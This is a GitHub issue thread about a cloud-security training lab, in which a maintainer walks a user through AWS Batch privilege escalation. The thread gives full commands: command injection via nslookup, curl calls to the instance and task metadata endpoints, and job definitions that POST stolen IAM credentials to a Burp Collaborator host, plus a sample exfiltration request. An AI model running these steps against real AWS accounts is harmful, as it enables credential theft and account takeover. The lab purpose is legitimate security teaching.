### ISSUE TITLE
Messing around with AWS Batch For Privilege Escalations

### ISSUE THREAD

**Issue by punitdarji** [doyensec/cloudsec-tidbits#1]
During the analysis, I have observed that `aws batch register-job-definition --job-definition-name poc-get-rolename --type container --container-properties '{ "image": "curlimages/curl",
"vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=``curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600``; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-
data/iam/security-credentials/ > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'` command won't giving any response. I have checked in ubuntu and windows. As we are not authorized, how can we get the job queue name? `--job-queue LowPriorityEc2` Could you tell me where it is mentioned? 

`iam-instance-role-20230322003148155300000001` How did you retrieve? 

It may require the same account.

As per my understanding with written blow, You are already inside the container and perform `env` command. 

https://blog.doyensec.com/public/images/batch-ecs-job.jpg

**Comment by anaximand3r** [comment]
Hi @PunitTailor55! Thanks for reaching out.
You can get the job queues with the following command:
`aws batch describe-job-queues --region us-east-1
`
Then, you can register the job definition to get the role name
`aws batch register-job-definition --job-definition-name attacker-jb --type container --container-properties '{"image": "curlimages/curl", "vcpus": 1, "memory": 20, "command": [ "sh", "-c", "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ >> /tmp/out; curl -d @/tmp/out -X POST http:/<YOUR_BURP_COLLABORATOR_INSTANCE>/exfil"]}' --region <YOUR_REGION>`
**Note**: substitute `YOUR_BURP_COLLABORATOR_INSTANCE` and `YOUR_REGION` according to your setup.
Finally, run the submit command using the “insecure” queue 
`aws batch submit-job --job-name attacker-jb --job-queue LowPriorityEc2 --job-definition attacker-jb --scheduling-priority-override 999 --share-identifier asd --region us-east-1
`
The collaborator will get the instance role arn, example:
_iam-instance-role-20230612162917512700000002_

At this point, you can extract instance AWS keys

`aws batch register-job-definition --job-definition-name attacker-jb --type container --container-properties '{"image": "curlimages/curl", "vcpus": 1, "memory": 20, "command": [ "sh", "-c", "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<RETREIVED_INSTANCE_ROLE_NAME> >> /tmp/out; curl -d @/tmp/out -X POST http://<YOUR_BURP_COLLABORATOR_INSTANCE>/exfil"]}' --region <YOUR_REGION>
`
**Note**: substitute `RETREIVED_INSTANCE_ROLE_NAME`, `YOUR_BURP_COLLABORATOR_INSTANCE` and `YOUR_REGION` according to your setup and previous steps.

Then, run the submit command using the “insecure” queue
`aws batch submit-job --job-name attacker-jb --job-queue LowPriorityEc2 --job-definition attacker-jb --scheduling-priority-override 999 --share-identifier asd --region <YOUR_REGION>`
Your collaborator will receive the credentials with the instance role 🚀

**Comment by punitdarji** [comment]
As per my understanding you have credentials. I would like to understand the scenario. How did you get the credentials and how did you get the shell? Is aws batch command run in same account where I have setup? Because when I am trying to get details from 169.254.169.254 I didn't get any response.

**Comment by anaximand3r** [comment]
Now I understand. Probably you did not perform the initial exploitation. The steps I have shared before assumed the compromise of the job role used to run the lab web app lookup.

This lab scenario allows users to use the `nslookup` tool.
The utility is vulnerable to command injection, so “_nslookup google.it; whoami_” in the main page will return:
```
Server:		10.99.0.2
Address:	10.99.0.2:53
Non-authoritative answer:
Name:	ouad.it
Address: 195.110.124.133
Non-authoritative answer:
curl_user
```
Then, the user tries to call the IMDS endpoint:
`google.it; curl --connect-timeout 10 http://169.254.169.254/latest/meta-data
`
The command will fail since the task job is running within a FARGATE managed compute environment. Due to that, the access to the IMDS is restricted.

Users should  know the existence of [Task Metadata Endpoint](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint-v2.html).

In Fargate, if the **jobRoleArn** is defined in the batch job definition, users can interact with the task metadata endpoint and get the scoped AWS identity credentials.

Job role configuration 
> You can optionally specify an Identity and Access Management (IAM) role that provides the container in your job with permissions to use the AWS APIs. This feature uses Amazon Elastic Container Service (Amazon ECS) IAM roles for tasks functionality.

Once found that the IMDS is restricted, user should call the task metadata endpoint and exfilter the credentials with:

`google.it; curl http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI >> /tmp/out ; curl -d @/tmp/out -X POST http://<YOUR_BURP_COLLABORATOR_INSTANCE>/exfil
`
User will get a response like the following one 
```
POST /exfil HTTP/1.1
Host: YOUR_BURP_COLLABORATOR_INSTANCE.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 1430
Content-Type: application/x-www-form-urlencoded

{"RoleArn":"arn:aws:iam::REDACTED:role/ecs-role","AccessKeyId":"REDACTED","SecretAccessKey":"REDACTED","Token":"REDACTED","Expiration":"2023-03-22T04:05:16Z"}
```
After getting the creds:
```
export AWS_ACCESS_KEY_ID=XXX
export AWS_SECRET_ACCESS_KEY=XXX
export AWS_SESSION_TOKEN=XXX
```
At this point, the steps previously described start since you have the task role and you are able to register batch jobs, list queues and so on.
